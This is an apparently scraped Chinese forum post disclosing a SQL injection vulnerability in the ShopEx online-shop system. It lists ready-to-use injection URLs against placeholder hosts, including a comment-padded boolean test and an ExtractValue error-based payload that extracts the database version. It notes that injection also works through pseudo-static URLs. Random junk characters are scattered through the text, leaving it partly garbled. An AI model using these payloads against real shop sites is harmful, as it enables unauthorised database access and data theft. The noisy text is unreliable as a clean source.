注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…" p* n: h+ v) ^: E1 e2 \# G" p( Z
) U6 Z* C& V' U$ o5 i: K( i好吧,我扯远了~~
4 {% {/ @: h1 M* g( G/ W' J其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~9 c5 [1 u7 ] q# B
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:' t0 c# A: {% M2 |3 T
5 |5 i j+ j2 R) B! G& C8 u2 s) Nhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html+ @' s, C1 T) [' w
% r8 c- _( S5 M! x) l* U8 Vhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html& D0 B+ z/ _ U5 a3 _# \6 F( B
k) h, M) ~9 \$ \: vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html0 ~- k4 N: c" i* L' \1 F5 y
6 F8 N' l. H* ^% o9 i' {4 S( X
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
# e$ g1 C+ @* @. A. h% W4 n3 K" h
1 h. Z$ [" F0 g3 G, L. g# `
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
0 Q- H' s1 G& C8 Q% \1 F) [" l8 s" M如何注入就不多说了,10多年的东西了…不会也会了…+ v: B% r, H0 T. ~
2 p$ A9 C, n5 C- i, X, E/ ` |